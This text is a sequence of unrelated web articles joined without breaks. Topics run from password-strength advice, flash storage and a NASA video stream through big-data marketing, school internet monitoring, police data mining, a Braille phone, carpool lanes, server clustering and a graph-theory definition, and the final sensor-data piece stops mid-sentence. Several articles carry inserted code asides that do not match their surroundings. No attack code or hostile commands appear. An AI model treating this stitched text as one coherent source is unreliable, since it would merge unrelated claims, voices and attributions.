We understand that most of our clients are business-oriented rather than security-focused, so many don’t realize the true implications of a password compromise. For example, a client recently asked us to reset a password for one of their users’ email accounts and provided us with a very weak password to use (in fact, the username was the same as the password). After we explained how easy that new password would be to guess, they replied, “Oh, it doesn’t really matter if someone breaks into this email account; it’s not used for anything important.”

A compromise of the email messages themselves is only one aspect. In most cases, email accounts are compromised so that they can be used to send out spam. Imagine hundreds of thousands of spam emails being sent from one of your email addresses. Not only can this affect your company’s reputation, but your mail server will likely get blacklisted, which means important emails may not be received. Resolving blacklist issues can take days, leaving your entire company’s email crippled in the meantime. And the impact of blacklisting doesn’t stop at your own users and domain: if you’re hosted on a shared mail server, all of the domains hosted on that server become blacklisted. Weak passwords can easily lead to a compromise of any service – FTP, control panel, database, email – as well as non-hosting accounts such as Facebook and your bank account, and each can have its own dire consequences.

What is a Weak (bad) Password?
Examples of bad passwords are those that:
- contain a dictionary word, your username, company name, or other identifying information (such as your pet or child’s name) – even if you add numbers or other characters after the word;
- are too short (under 8 characters);
- are commonly used passwords, based on statistics from hundreds of thousands of leaked passwords (“password” is not a good password; neither is “123456”). Here are 500 horrible passwords that are insanely popular and thus easily guessed. *Please note this image contains foul language, so we do not recommend viewing it if you may be offended. (image credits: http://www.forevergeek.com/2010/07/500_worst_passwords)

Most people will find that they have used passwords in the above lists. Note that attackers have lists containing hundreds of thousands of passwords and use tools to test various combinations (such as adding numbers at the end of a word).

How do I choose a Strong Password?
There are many methods, but here are some recommendations:
- Use a random password generator – PC Tools has a really easy to use password generator at http://www.pctools.com/guides/password/
- Create a password from your favorite song – take the first letter of each word of a lyric and mix in some other characters to strengthen the password. For example, “Twinkle, Twinkle Little Star, How I wonder what you are” could become: TtL*HIwwya5.

Finally, it’s important not to use the exact same password for all your online services. Even if you have a very strong password, if it is leaked due to a compromise of a service you use (social networking sites, online forums, etc.), attackers may try that password on other web sites to see if they can access your other accounts (banks, shopping sites where your password may be stored, such as amazon.com, and other sites or services).
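As an aside, the generator approach above doesn’t require a third-party tool. Here is a minimal sketch using only Python’s standard library; the length and character set are arbitrary choices for illustration, not recommendations from this article:

import secrets
import string

def generate_password(length=16):
    """Return a random password drawn from letters, digits and punctuation."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*()-_=+"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())   # e.g. 'q7!Vr)_kP2x+Zm9a'

The secrets module uses a cryptographically strong random source, which is the property that matters here; a generator built on ordinary pseudo-random numbers would be easier to predict.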
HELP! How will I ever remember my new Passwords?
The easiest way to manage your passwords securely is with a password storage application that runs on your computer and, ideally, also on your mobile devices, so you can access your passwords from anywhere. It’s important to choose a password application that encrypts your passwords, so that if your PC or phone is stolen the thief cannot see your stored passwords. With a password application you typically only need to remember one password; that master password unlocks the application and gives you access to all your saved passwords. LastPass (https://lastpass.com) is a great option, as it can sync your passwords across many computers and devices (iPad, iPhone, Android), and it also has a built-in password generator. LastPass also has other useful features, such as the ability to create secure notes and to securely save personal information so you can easily fill out online forms (including your credit card number, if you wish).

We hope this information has been helpful, and we highly advise all users to review the passwords they currently have in place and find a password strategy that works best for them and their organization.

Nathalie Vaiser, CEH, MCP, MCTS, Linux+
Nathalie’s personal blog: http://admingal.com
Nathalie is the Virtualization Program Manager for Applied Innovations, a leading Windows web hosting provider at http://appliedi.net
What Is An All-Flash Array?
An All-Flash Array, also referred to as an SSA or Solid State Array, is data storage that contains multiple Flash memory drives. All-Flash storage contains no moving parts, which means significantly less heat generated, less power utilized, and less maintenance. From a functional standpoint, All-Flash technology powered by Intel® Xeon® processors provides vastly superior performance: fewer spikes in latency, better disaster recovery, support for real-time analytics, much faster data transfer rates, and the ability to free IT staff to focus on other tasks. All-Flash Arrays provide the foundation for next-generation business applications and the All-Flash data center.

What Is Flash Storage?
Flash Storage is storage media designed to store data electronically; the media can be electronically erased and reprogrammed. Flash represents a transformational shift in computing: by eliminating rotational delay and seek time, Flash provides responses orders of magnitude faster than traditional spinning disk. Flash Storage represents a performance breakthrough for storage operations (IO) and provides the foundation for enabling the next technology wave.

What Is A Hybrid Flash Array?
A Hybrid Flash Array is a combination of data storage units that utilize at least two types of storage media, one being Flash storage, the other being one of several possible options. Hybrid Flash arrays are used by businesses that need to store both hot and cold data in a single storage platform and want to balance performance and economics. Hybrid Flash arrays allow customers to choose the ratio of performance and capacity that best suits their specific needs to achieve the optimal value for their investment. The ability to add more Flash or capacity as needs dictate is a powerful benefit.

What Is Flash Based Storage?
Flash Based Storage is data storage media that delivers tremendous performance increases over traditional spinning hard disk drives. Flash Based Storage provides a dramatically lower cost per operation on a $/IO basis. This can mean significant capital savings for most business workloads, as well as for the virtual data center deployments that are practically ubiquitous in modern data centers. Virtualization causes a significant increase in IO density per server, a workload pattern whose performance can often be significantly improved, at lower cost, by leveraging Flash Based Storage technologies.

What Is Flash Technology?
Flash Technology is any storage repository that uses Flash memory. Flash memory comes in many forms, and you probably use Flash Technology every day: from a single Flash chip on a simple circuit board, to circuit boards in your phone, to a fully integrated “enterprise Flash disk” where multiple chips are used in place of a spinning disk, Flash Technology is everywhere!

What Is Flash SSD?
Flash SSDs are data storage devices that offer high-performance, low-latency storage, which provides significant performance, power consumption and cooling benefits over traditional spinning media. The I/O capability of Flash SSDs is 10x that of spinning drives. Customers use Flash SSDs for the best application response time to run virtual servers and virtual desktops and to unleash the power of analytics for real-time decision making for the business.
NASA plans live video feed from space
Video from a laboratory in the International Space Station will be available on the Internet
By Doug Beizer - Jan 29, 2010

NASA plans to stream live video from a laboratory inside the International Space Station and broadcast it on the Internet starting Feb. 1, a NASA official announced. The video will give the public an inside look at astronauts working in space, according to NASA. The video will be available during all crew duty hours. The space agency also recently started providing personal Internet access to astronauts aboard the space station. The new in-cabin streaming video will also include audio of communications between Mission Control and the astronauts, when available, according to NASA’s Jan. 27 announcement.

Since March 2009, NASA has provided streaming video of Earth and the station's exterior as the laboratory complex orbits 220 miles above Earth. Video from the station is available only when the complex is in contact with the ground through its high-speed communications antenna and NASA's Tracking and Data Relay Satellite System. During "loss of signal" periods, Internet viewers may see a test pattern. When the space shuttle is docked to the station, the stream will include video and audio of those activities.

Doug Beizer is a staff writer for Federal Computer Week.
In the early 2000s Doug Laney, vice president at research firm Gartner, defined the three Vs of big data: volume, velocity and variety. Since then, following the development of the big data trend, industry expert Mark van Rijmenam has added four extra Vs – veracity, variability, visualisation and value – to demonstrate how to deal with the demands of big data. So what are all these new Vs and what do they mean for big data? Has the concept of big data really changed?

Veracity, the first new V, is essential for big data. For the analysis to be correct, the data itself must be accurate. The large volume and velocity of big data means that it is statistically likely to contain a large number of errors. Good business analytics software should already have a data validation process. This means that, from the beginning, errors and discrepancies are spotted, so only high quality data is subsequently analysed, reported and actioned.

Variability is an extension to Laney’s original variety. Big data collected from multiple sources can take a variety of different formats. Data can now be collected from transactions, social media comments or sensors. While this large amount of data can be beneficial to companies, it can be overwhelming if they don’t know how to properly action it. For example, in the retail industry companies improve their brand perception and customer loyalty by monitoring variables including purchasing habits, social media interaction or in-store complaints. The problem with variability, especially for social media, is that most analytics software will be unable to register the meaning of a tweet in context. Therefore, it cannot correctly evaluate whether it is a positive or negative reaction. Using advanced analytics software, businesses can perform sentiment analysis on this kind of data. It contains algorithms that can interpret the context of the message and decipher the correct meaning of a word in context. This makes the data collected accurate and means that it can be visualised correctly, as either a positive or a negative view.

Although analysing big data can yield lots of useful information, many business leaders will struggle to make use of it if it is not presented in an easy to understand format. Powerful business analytics software is able to analyse data from multiple sources and convert it into one manageable stream of data. Businesses can then use this to change their processes quickly and easily, rather than having to manually correlate data across hundreds of files, documents and databases.

One of the specific pressures of big data is speed. With the rise of the Internet of Things (IoT), more and more devices are becoming equipped with sensors that can feed back data. Although data analysts would traditionally use manually generated reports, new monitors such as smart meters demand near real-time reporting. This is clearly impossible to do without the use of analytics software and means that quick and easy visualisation interfaces are essential. Although many analytics programmes can capture data in real time, some software relies on SQL queries to perform searches. Even for the most technologically savvy employees, generating these queries still takes time. This means that the queries are not truly representative of real-time reporting. Software such as Connexica’s CXAIR features a user-friendly, search-engine style interface, which allows anyone to generate accurate, up to date reports and means that employees can view data and make decisions instantly.
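As a toy illustration of the sentiment point made earlier – and emphatically not Connexica’s actual algorithm – a crude lexicon-based scorer with one-word negation handling might look like the sketch below; the word lists are invented for the example:

POSITIVE = {"love", "great", "helpful", "fast"}
NEGATIVE = {"slow", "broken", "awful", "rude"}
NEGATORS = {"not", "never", "no"}

def sentiment(text):
    """Return a naive sentiment score: positive > 0, negative < 0."""
    score, negate = 0, False
    for word in text.lower().split():
        word = word.strip(".,!?")
        if word in NEGATORS:
            negate = True
            continue
        if word in POSITIVE:
            score += -1 if negate else 1
        elif word in NEGATIVE:
            score += 1 if negate else -1
        negate = False
    return score

print(sentiment("The checkout was not slow and the staff were great"))  # prints 2

Production sentiment engines go much further (part-of-speech tagging, sarcasm, domain-specific vocabularies), which is exactly why the context handling described above matters.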
Smart visualisation is truly the first step to the democratisation of business intelligence — the ability for anyone in the business, regardless of their technical ability, to gain actionable insights from big data. This means that, instead of spending hours poring over complicated reports, business leaders can roll out self-service analytics, making data accessible to all, from administration clerks to C-level leaders.

The value of big data is in the analysis, not in the data itself. Research firm McKinsey predicts that big data has a potential annual value of $250 billion to Europe’s public sector. However, this data is pointless and worth nothing if it cannot be effectively actioned. For example, the UK Mid Kent Services (MKS), a local authority partnership consisting of Maidstone, Swale and Tunbridge Wells Borough Councils, used Connexica’s CXAIR business analytics software to deal with a staggering volume of data. The data consisted of over 20 million car parking records, 500,000 service-call records and 65,000 council tax records. Certainly not an easy task. In the past, administrative staff had to spend time combining data from multiple data sources in order to prepare reports for managers – an obviously time-consuming and inefficient manual process. With the new software, managers could see all of this information in one format, meaning that it could be transformed into actionable data. By eliminating the manual processing, MKS was able to deliver reports much more quickly, more accurately and with information that could be actioned in a more timely manner.

In the same way that Van Rijmenam’s additional Vs help us to better understand the complexities of modern big data, the same is true for the way we analyse data. Given the increase in the amount of data that businesses must now manage, it makes sense that they use effective ways to gather, sort and analyse it. This is where good business analytics software is indispensable – with the right software and the right plan, maintaining manageable and actionable data is no longer a daunting task.

Greg Richards, sales and marketing director, Connexica
“The aim of education is to provide children with a sense of purpose and a sense of possibility and with skills and habits of thinking that will help them live in the world.” – Alice Waters

In a recent study by Impero’s researchers, 96% of students polled said that their schools use website blocking to impose internet safety. Of those, 35% of students admitted to going around online blocks to access prohibited sites. These statistics suggest that merely blocking online access in schools just isn’t working. Instead of blocking websites, why not monitor student internet usage? Monitoring goes along with many core teaching principles that promote both higher-level thinking in students and successful classroom management for teachers. Here are several of the advantages of monitoring, as related to insights from teaching experts and authors:

Monitoring reinforces teaching procedures
In his book, The First Days of School, teaching great Harry Wong said that classroom management overarches everything in the curriculum. He teaches that educators should have classroom routines. They should invest time in practicing classroom procedures with students until they become ingrained into daily activities. Wong’s technique for teaching procedures follows the sequence: Explain, Rehearse, Reinforce, Remind, Experience.

When students are being monitored on the internet, procedures can be laid out by the teacher from the first day of school. Teachers can explain what students should do if they come across something inappropriate on the web. They can tell kids what to do if someone is bullying them online. They can also explain how to communicate these things in private without causing disturbances or being embarrassed. Teachers can then rehearse these procedures until students feel comfortable, and can continuously reinforce them by reminding students and giving them experiences in which to practice. Creating procedures and following them allows the student to be empowered to make good choices. Procedures also allow the teacher to manage the classroom in a positive way that is not policing.

Monitoring builds cognitive strategies
In the best seller, A Framework for Understanding Poverty, Ruby Payne explains the benefits of mediation for students. Mediation is the intervention of an adult during a child’s response to mental stimulus. Mediation builds cognitive strategies, or those strategies that give individuals the ability to plan and systematically go through data. When a child doesn’t learn cognitive strategies, she lacks significant skills to navigate the world.

How does this connect to monitoring internet usage instead of blocking it? Monitoring gives teachers and administrators the ability to mediate the decision-making processes of the student. By monitoring usage and teaching how to navigate the web in safe ways, teachers are able to build cognitive strategies in students, which in turn builds higher-level thinking and problem solving skills.

Monitoring promotes Bloom’s highest level thinking
According to Bloom’s Taxonomy Cognitive Domain, there are six levels of thinking, the highest of which is Evaluation. Student behaviors that show the Evaluation level of thinking include assessing the effectiveness of whole concepts in relation to values, outputs, efficacy and viability; critical thinking; strategic comparison and review; and judgment related to external criteria.
When internet sites are blocked, the student is not given the opportunity to evaluate and create strategy, other than how to strategically hack through to sites that are banned. By monitoring the web, combined with providing procedures and communicating about problems, the teacher is providing opportunities for the highest level of Bloom’s thinking: Evaluation.

Monitoring is proactive and reactive
Impero believes that monitoring online usage is the best way to help students learn to use the internet safely. Research has shown that blocking measures have little impact when students are determined to access content. Now is the time to adopt a different approach and monitor online behavior instead. This will allow schools to act proactively and react appropriately in the event of protocol breaches. Impero Education Pro software provides schools with the ability to proactively monitor the online activities of digital devices while they are being used in classrooms. To find out more about this solution, go to the product features page. Impero offers free trial product downloads, webinars, and consultations. Call us at 877.883.4370 or email us at email@example.com today for more information.

A Framework for Understanding Poverty – Ruby K. Payne, Ph.D., 1995
The First Days of School – Harry Wong and Rosemary Wong, 2009
A Taxonomy for Learning, Teaching, and Assessing – Anderson, Lorin W. (Editor) / Krathwohl, David R. (Editor) / Bloom, Benjamin Samuel (Editor), 2001
A kid's game, sometimes called "Concentration," is a test of a player's memory. With a set of cards dealt face-down on a table, players take turns picking up two cards, hoping to find they are of the same value. If they don't match, the cards are returned to the table face-down. The challenge is to remember the location and value of the cards you or the other players pick up so in subsequent turns you're able to match them up. The player with the most pairs wins. Without proper investigation tools, police and law enforcement agencies may find themselves unwillingly playing their own game of "Concentration" as they wade through mountains of information available online. This is more true when investigating possible narcotics offenders. By its very nature, drug trafficking involves some organization -- transportation, distribution and sales "channels" -- all of which try to keep themselves hidden. Investigating such organizations may require correlating apparently unrelated information and finding submerged links between people and organizations. The growing amount of online data could make this work easier if access to it was automated. Florida's St. Petersburg Police Dept. had more online data than could be known or effectively used by detectives in the course of doing routine investigations. "We had 10 years of data in a fairly sophisticated database, and we could extract fields and look up data," said Leonard Leedy, a vice and narcotics detective with the St. Petersburg Police Dept. "We have also been sharing data with the Pinellas County Sheriff's office for 4 to 5 years. What we've been unable to do is extract information from the narratives of our reports." Under the department's system, officers enter basic information about an incident into an online form. This form includes such things as the names of involved parties, the time of the incident, etc. What officers do not type themselves are the narrative descriptions of the incident. Instead, they dictate the narratives, which are later transcribed. This method saves officers time and has proven a much more cost-efficient division of work. When the narratives are later transcribed, they are electronically associated with the basic data entered by the detectives. Although the narrative data has technically always been available online, the existing software couldn't search the narratives, let alone do sophisticated data mining to help identify links. Development of a system to access narrative data began a couple of years ago when representatives of the federal Counterdrug Technology Assessment Center (CTAC) approached the department. CTAC falls under the Office of National Drug Control Policy and is the "central counterdrug enforcement research and development organization of the U.S. government." "CTAC ... said they were interested in a project involving sharing of data and technology," said Leedy. "They sat 30 narcotics detectives down and asked them, 'If you wanted to have a computer that could do anything, what would it be?'" Following the initial meetings, the University of Tennessee got involved to do the application development. Rather than suggesting theoretical solutions from afar, the university took the time to really find out what was needed. "The university sent people down and they rode along with us to get a feeling for what life was really like," commented Leedy. 
"They came down and listened to us and the applications were developed based on the voiced needs of the working detectives" This development style is well known to CTAC's chief scientist and director, Albert E. Brandenstein. "I did a lot of command and control development with ARPA [now DARPA, the Defense Advanced Research Projects Agency] and other places," said Brandenstein. "Those kinds of projects are measured by hands-on success from the very beginning. You can't go away and develop for three years -- it's a matter of how the users like data presented to them." What came out of this design phase was a plan for several applications, collectively known as the West Florida Counterdrug Investigative Network (WFCIN). According to Brandenstein, the system included the first use of an ATM network for state or local law enforcement. The first application to be implemented gives officers the ability to data mine through information contained in the online narrative reports. This is done using a Web interface that talks through a backend process to the existing database system. Both the interface and the backend were developed by the university. For example, if a detective receives a report of an incident in which a drug dealer used a specific type of gun, he can enter the gun type and get back a standard HTML page with links to narrative reports in which that type of gun is mentioned. The application runs on a Sun workstation that was chosen, at least in part, because it provides a lot of freedom to scale the application -- downwards for other agencies with less online data -- and upwards as a department's data store grows. It has also proven very fast in doing searches. Currently, the application only accesses St. Petersburg Police Dept. databases, but future phases will extend the search to other jurisdictions so data can be shared between agencies. The second application to be implemented stores images -- surveillance photographs, evidence photographs or scanned newspaper articles. "It stores the images and links them to the case," said Leedy. "The University of Tennessee wrote a very neat package we use to scan our photographs using standard software -- we have an HP 4C scanner and digital cameras and use the shareware Paintshop Pro (by JASC Software) to store the images on the hard drive. Using the WFCIN application, you go into the image import program, which grabs the image. The application automatically creates the thumbnails, scales them and stores them linked to the case. "Say you have 100 images on a case, and one is a photograph of a gun under a bed. The user can go into the comments section and type in 'gun under bed.' The application links the comments to the photo and stores that information. When you are done, the comments become part of the data mining source file; so now, if you type in 'gun under bed,' it will not only search the narratives, but also the photos associated with it," said Leedy. Searches will return links to both the text-based narrative and the images. The network's image-carry capacity extends to realtime audio and video for teleconferencing -- or for sharing video monitoring tapes with law enforcement officers in other jurisdictions -- although these applications have yet to be implemented. Another WFCIN application, which is still about 3 to 6 months from general use, will provide "link analysis." Link analysis is a tool that graphically displays connections or "links" between individuals, groups and organizations. "This has been done in the Dept. 
This kind of functionality can help locate associations that otherwise would have gone unnoticed and that may be key to developing a case or directing an investigation.

The Complete Package
CTAC's part in the WFCIN project is to help develop these applications and then provide a means for exporting and customizing them for other jurisdictions. "This year, Congress has appropriated a technology transfer pilot program to take some of this technology and widen the audience," said Brandenstein. "We were also directed to come up with area experts to help decide on where this goes and how it is to work." To accomplish this, CTAC planned a meeting early this year to bring together experts from around the country to review the technology and help advise on the direction for future research.

The data mining applications being developed and used by the St. Petersburg Police Dept. are still in the beginning stages, but they show the promise of things to come. A complete, integrated package that allows investigators to search across jurisdictions for common characteristics and build link analysis charts to help identify the key culprits and their associates will help bring crime investigation and prosecution into the 21st century. Such tools should help take police out of the business of playing "Concentration" with online data and put them more solidly in the business of directing and completing investigations.
Long before there was a World Wide Web, when the internet was largely a playground for academics and the military, and most people still thought spam was a canned meat, there were already hoaxes and scams (pyramid schemes, Ponzi schemes, lures into premium rate phone services, fake friends and stalkers...). Early internet worms evolved into the mass-mailers of the last decade and then into Facebook clickjacking apps. Old-school viruses evolved into a range of threats from botnets to specialized banking trojans to the highly specialized attacks that some call APTs . And just as the pre-WWW world of Usenet and email morphed into social networks and Twitter, so too did malicious social engineering – focused on psychological manipulation rather than malicious code – adapt effortlessly to the new environment. Hoaxes and scams both incorporate deception, and may even look very similar, but scams are largely motivated by profit. The hoaxer is more likely to be bolstering his/her own self-esteem by proving how stupid others are than anticipating any financial gain. There’s an interesting parallel here. Before the malware scene became all about profit, virus writing was mostly about glorifying the virus writer and giving them 'bragging rights' among peers, though in some cases there was a clear intent to do damage to data. Similarly, while the contemporary scammer or malware writer is happy to exploit gullibility for profit, the hoaxer usually contents themselves with proving that other people are more ‘stupid’ than they are. However, it’s likely that profit-driven scammers sometimes justify their activities to themselves by stressing the victim’s undesirable stupidity: de-personalization of the victim is a significant factor in preserving the criminal’s favorable self image.
World's first Braille smart phone will soon be a reality

Several years ago, the FOSE trade show hosted a panel on accessibility in government IT. One question in particular stuck with me to this day: a blind gentleman asked the panelist from Research In Motion (now BlackBerry) when they would put out a BlackBerry for the blind. Of course, back then no one had a good answer for him, even though the question got a near-standing ovation from the audience. Well, that question may soon be answered. A developer in India by the name of Sumat Dagar has developed the world’s first Braille smart phone. "This product is based on an innovative 'touch screen' which is capable of elevating and depressing the contents it receives to transform them into 'touchable' patterns," Dagar told the Times of India. He developed this specifically because he saw that technology tended to serve the mainstream and ignore anyone with special needs.

The phone uses Smart Memory Alloy technology to make small pins rise out of the body of the device in patterns, so they can form Braille letters or any other necessary shape. The alloy moves into one of two states (up or down) depending on the electrical impulses it receives.

Braille seems to be gradually — very gradually — working its way into the mobile device world. Early in 2012, researchers at Georgia Tech produced a prototype app that uses Braille for touch-screen devices, although the researchers envision it as an app for any smart phone user who wants to text without looking at the screen. And a university student in England has designed a DrawBraille Mobile Phone, but it remains in the concept stage. Improvements in touch-screen technology, such as the Smart Memory Alloy in Dagar’s phone or the microfluidics screens from Tactus Technology, could make smart phones for the blind more viable.

Section 508 of the Rehabilitation Act Amendments requires federal agencies to ensure that the electronics and IT products they buy are accessible. With regard to smart phones, it has to date focused on apps. But with mobile devices becoming common tools for employees and citizens, the option for phones that accommodate the visually impaired could become a necessity.

Posted by Greg Crowe on May 01, 2013 at 9:39 AM
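To make the pin-pattern idea concrete, here is a small, purely illustrative sketch (not Dagar's firmware): each letter maps to the set of dots in a standard six-dot Braille cell that a refreshable display would need to raise. Only the letters a-j are shown.

# Standard 6-dot Braille cells: dots 1-3 run down the left column,
# dots 4-6 down the right column.
BRAILLE_DOTS = {
    "a": {1}, "b": {1, 2}, "c": {1, 4}, "d": {1, 4, 5}, "e": {1, 5},
    "f": {1, 2, 4}, "g": {1, 2, 4, 5}, "h": {1, 2, 5}, "i": {2, 4}, "j": {2, 4, 5},
}

def pins_to_raise(text):
    """Return, for each character, the pins the display should elevate."""
    return [sorted(BRAILLE_DOTS.get(ch, set())) for ch in text.lower()]

print(pins_to_raise("hi"))  # [[1, 2, 5], [2, 4]]

The hard part of a device like Dagar's is not this mapping but the actuator layer that physically raises and lowers the pins fast enough to be read by touch.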
What is an IP Address? (Internet Protocol Address)

Every system connected to the Internet has a unique IP address: a string of numbers that identifies a computer or server on the Internet. An IP address is a 32-bit numeric address written as four numbers separated by periods, for example 192.168.10.1. Computers have no problem locating and remembering numeric addresses. In contrast, most humans have trouble remembering long, complicated sequences of numbers. So, to make surfing the web easier, the DNS (Domain Name System) was invented. This system allows people to use easy-to-remember names for web sites instead of those numbers.

So what are a few of the reasons you would want to know your IP address?
- "Remote access" applications such as PCAnywhere are one reason: you need to know your IP address in order to use them. These remote access applications allow you to access your PC from another PC over a network. XP also offers a remote access application to connect two PCs. Note that you can use remote access applications over most connections from your home or office: Local Area Networks (LAN), Wide Area Networks (WAN), ADSL, cable, ISDN and even dial-up phone connections work well.
- "Multi-user Internet games" also require you to know your IP address.

There are many ways to stay safe while browsing the internet: there are firewalls, VPNs, and a variety of other types of programs that'll help you stay secure online. A good resource is VPN at ATT.com if you want to find out more about what VPNs are and what they do.
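As a small illustration of the name-to-number mapping described above, Python's standard socket module can perform the DNS lookup that turns a host name into its numeric address; the host name below is just an example:

import socket

ip = socket.gethostbyname("www.example.com")  # DNS lookup: name -> numeric address
print(ip)  # e.g. '93.184.216.34'

Running the same call against your own machine's name, or asking your router for its WAN address, is how remote access tools and multiplayer games learn which numeric address to connect to.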
Transportation researchers affiliated with the University of California, Berkeley, have used roadway sensor data to come to a surprising conclusion: Discontinuing a program that gave solo drivers of hybrid vehicles access to carpool lanes has slowed traffic in all lanes. Conventional wisdom would lead one to believe that with fewer hybrids in the carpool lane, the traffic in that lane would speed up. But that hasn’t been the case. Everybody has slowed down — the drivers of hybrid vehicles and all other motorists on the road. “Drivers of low-emission vehicles are worse off, drivers in the regular lanes are worse off, and drivers in the carpool lanes are worse off. Nobody wins," said Michael Cassidy, University of California, Berkeley, professor of civil and environmental engineering, in a news announcement from the university. Cassidy and a graduate student studied six months’ worth of data from roadway sensors in the San Francisco Bay Area before and after the carpool lane privileges were revoked for hybrid cars. For one stretch of freeway in Hayward, Calif., the researchers concluded that carpool lane speeds were 15 percent slower after hybrids were expelled. One, the researchers found that when hybrids moved back into the regular traffic lanes, those lanes were slower — and that contributed to a slowdown in the adjacent carpool lane. "As vehicles move out of the carpool lane and into a regular lane, they have to slow down to match the speed of the congested lane," explained Kitae Jang, the doctoral student who contributed to the research. "Likewise, as cars from a slow-moving regular lane try to slip into a carpool lane, they can take time to pick up speed, which also slows down the carpool lane vehicles." Two, in Cassidy’s words, “Drivers probably feel nervous going 70 miles per hour next to lanes where traffic is stopped or crawling along at 10 or 20 miles per hour. Carpoolers may slow down for fear that a regular-lane car might suddenly enter their lane.” The researchers said that in order to improve traffic flow, more vehicles — not fewer — should be allowed into carpool lanes. The researchers presented their results in a report published by UC-Berkeley’s Institute of Transportation Studies. The researchers’ paper is available here. According to the university, in 2005 California began giving low-emission vehicles, including hybrids, a yellow sticker that qualified them to drive legally in the carpool lane. An estimated 85,000 hybrids in the state had the passes. The program was discontinued July 1 in order to comply with a federal regulation that, according to the Institute of Transportation Studies, requires low-emitting vehicles “be expelled from a carpool lane when traffic slows to below 45 mph on any portion of that lane during more than 10 percent of its operating time.”
Server Clustering Basics

With the cost of computer hardware decreasing on a daily basis, many organizations are turning to server clustering as a means of increasing their server uptime. The term “clustering” might be familiar from your IT travels. It certainly gets quite a bit of press, and for some very good reasons. This article will explore server clustering, with the assumption that you have no prior familiarity with clustering technology, but do have an intermediate understanding of PC hardware, computer networking and server operating systems.

What Is a Server Cluster?
In its most elementary definition, a server cluster is at least two independent computers that are logically and sometimes physically joined and presented to a network as a single host. That is to say, although each computer (called a node) in a cluster has its own resources, such as CPUs, RAM, hard drives, network cards, etc., the cluster as such is advertised to the network as a single host name with a single Internet Protocol (IP) address. As far as network users are concerned, the cluster is a single server, not a rack of two, four, eight or however many nodes comprise the cluster resource group. Several different server operating systems support cluster configurations. Probably the two dominant cluster-aware server operating systems in today’s IT marketplace are the myriad Linux distributions and Microsoft Windows Server 2003 Enterprise Edition and Datacenter Edition. Novell NetWare 6.x also supports clustering services.

Why Deploy a Server Cluster?
The chief advantages for organizations that deploy cluster server configurations are high availability, high reliability and high scalability.

High availability refers to the ability of a server to provide applications and services to users often enough to meet or exceed an organization’s uptime goals. A cluster server configuration provides a higher degree of availability to services and applications than a non-clustered server configuration.

High reliability means that a server computer provides fault tolerance in the event of system failure. Fault tolerance, in turn, eliminates a single point of failure for a particular subsystem (be it the hard-disk subsystem, CPU subsystem, power supply subsystem, etc.) by providing redundancy. Server clustering takes high reliability a step further by providing fault tolerance for applications and services running on the cluster resource group. For instance, if one node in a cluster were to fail, the other nodes could continue to provide applications and services for the rest of the network. The network’s end users never need to know there was a hardware or software failure on a server computer.

High scalability denotes the capacity of a network environment for future growth with an eye toward improved performance. Specifically with regard to clustered server implementations, server nodes can be scaled up by adding additional hardware resources to each node, such as additional CPUs, RAM, hard drives, etc. Clustered servers can be scaled outward by adding more nodes to the resource group.

Availability, reliability and scalability lead many organizations to set up a clustered server environment. But are there any immediate downsides to a clustered environment? Obviously, additional cost is a concern. Even with server hardware costs being relatively low nowadays, a quad-processor RAID-5 server computer does not come cheap.
Add to that the licenses involved for enterprise versions of your server operating system, relational database management system (RDBMS) software, Web server software and so on, and the costs are not insignificant. Another consideration before deploying and maintaining a clustered server environment is the additional training that may be required for an organization’s IT staff to become proficient in setting up and operating the cluster. Again, these costs, which might involve instructor-led training, certification exams and overtime pay, must not be taken lightly by organization decision-makers.

How Are Server Clusters Implemented?
Most commonly, server clusters are known as either server farms or server packs. A server farm is a clustered group of server computers that run the same applications and services but do not share the same repository of data. That is, each node in a server farm stores its own local, identical copy of a data repository that is periodically synchronized with the other nodes in the server farm. An example of a server farm would be a cluster group of Web servers, where each server might run a local instance of Microsoft Internet Information Services. However, the cluster handles requests for service with each node retrieving data from its own local data store.

By contrast, a server pack is a clustered group of server computers that runs the same applications and services and also shares a common data repository. A good example of a server pack would be a cluster of nodes running Microsoft SQL Server. In a server pack configuration, all nodes in the cluster connect to a separate, shared disk subsystem and retrieve data from the shared data store. Fibre Channel and SCSI are the two most common interface technologies in use today for shared disk storage among cluster nodes.

Tim Warner is director of technology for Ensworth High School in Nashville, Tenn. He can be reached at email@example.com.
Definition: A path that starts and ends at the same vertex and includes at least one edge.

Generalization (I am a kind of ...)
Specialization (... is a kind of me.): Hamiltonian cycle, Euler cycle.
Aggregate parent (I am a part of or used in ...)

Note: Also known as "circuit" or "closed path". A cycle is usually assumed to be a simple path, ignoring the start (and end) vertex; that is, it includes vertices other than the start/end at most once. Having at least one edge means that there are at least two vertices in the path: the start/end and one other. It also means the path length is at least one. One way to find a cycle is to do a depth-first search, checking for repeated vertices. One step in finding all cycles is to look for strongly connected components.

Source: Paul E. Black, "cycle", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds., 4 November 2009. Available from: http://www.nist.gov/dads/HTML/cycle.html
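A minimal sketch of the depth-first-search approach mentioned in the note, for an undirected graph stored as an adjacency list (the example graphs are arbitrary):

def has_cycle(graph):
    """Depth-first search; a cycle exists if we reach an already-visited
    vertex that is not the immediate parent of the current vertex."""
    visited = set()

    def dfs(vertex, parent):
        visited.add(vertex)
        for neighbour in graph[vertex]:
            if neighbour not in visited:
                if dfs(neighbour, vertex):
                    return True
            elif neighbour != parent:
                return True   # repeated vertex reached by another route: cycle
        return False

    return any(dfs(v, None) for v in graph if v not in visited)

print(has_cycle({1: [2], 2: [1, 3], 3: [2]}))        # False (a simple path)
print(has_cycle({1: [2, 3], 2: [1, 3], 3: [1, 2]}))  # True (a triangle)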
Originally published September 23, 2010 Imagine a geologist who gathers data from a volcano in Hawaii twice a year for troubling indicators of an impending eruption. Over the years, this scientist would collect quite a heap of data on this volcano. But what would happen if, instead of sending the scientist out twice a year, sensors were installed to measure things like temperature and vibrations every five minutes? The volume of data collected would grow over 100,000 fold. There are a lot of troubling statistics about growing data volumes in the enterprise and the cost of storage, but sensors are poised to add more data to the scene than any other technology or sector. The cost of microsensors is plummeting, intelligent devices are expected to grow nearly six-fold by 2013, and automated data collection of the physical world is heralding what some call “the Internet of things.” IBM would call it a “smarter planet.” Whether it’s millions of RFID tags in Walmart’s supply chain, a network of sensors monitoring the nation’s water reserves or – over the next decade – sensors that control cars and traffic, huge volumes of streaming data on the real world create interesting and powerful new applications of analytics, but will be utterly crippling for conventional relational databases or RDBMSs. A large manufacturing plant could be collecting information such as temperature, pressure and humidity from hundreds of different key points in the plant every minute, resulting in a fire hose of data much larger and faster than anything that a human being would measure and 